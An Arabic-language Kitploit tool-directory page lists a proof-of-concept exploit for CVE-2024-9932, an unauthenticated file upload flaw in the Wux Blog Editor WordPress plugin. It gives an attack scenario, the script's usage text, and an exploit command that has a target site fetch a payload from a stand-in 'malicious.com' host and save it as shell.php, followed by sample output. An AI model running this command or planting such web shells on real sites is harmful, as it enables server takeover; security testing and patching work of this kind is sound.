Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9932-POC — استغلال إثبات المفهوم لـ CVE-2024-9932، ثغرة رفع ملف تعسفي غير مصادق عليه في إضافة Wux Blog Editor لـ WordPress، تتيح تنفيذ التعليمات البرمجية عن بُعد عبر رفع ملف خبيث. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-9932-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

استغلال إثبات المفهوم لـ CVE-2024-9932، ثغرة رفع ملف تعسفي غير مصادق عليه في إضافة Wux Blog Editor لـ WordPress، تتيح تنفيذ التعليمات البرمجية عن بُعد عبر رفع ملف خبيث.

عرض المستودع
10منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9932-POC

الوصف:

المكوّن الإضافي Wux Blog Editor لـ WordPress عرضة لرفع ملفات عشوائية بسبب عدم كفاية التحقق من نوع الملف في دالة wuxbt_insertImageNew. الإصدارات حتى 3.0.0 شاملة متأثرة. تسمح هذه الثغرة للمهاجمين غير المصادق عليهم برفع ملفات عشوائية إلى الخادم، مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

تفاصيل الثغرة

تنبع الثغرة من التحقق غير السليم من نوع الملف في دالة wuxbt_insertImageNew. وهذا يسمح للمهاجمين برفع ملفات خبيثة إلى الخادم دون مصادقة.

سيناريو الهجوم:

root@kitploit:~
يحدد المهاجم موقعًا إلكترونيًا يستخدم المكوّن الإضافي الثغرة.
يستغل وظيفة رفع الملفات لرفع شيل PHP خبيثة.
ينفّذ أوامر على الخادم المخترق.

الاستخدام

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

أمر الاستغلال

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

النتائج

مثال على نجاح الرفع

1- تم العثور على الملف:

2- نتيجة التنفيذ: انتقل إلى عنوان URL الخاص بالملف لتنفيذ الحمولة.

root@kitploit:~
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا السكربت على أنظمة دون إذن يعد غير قانوني.

تنزيل الأداة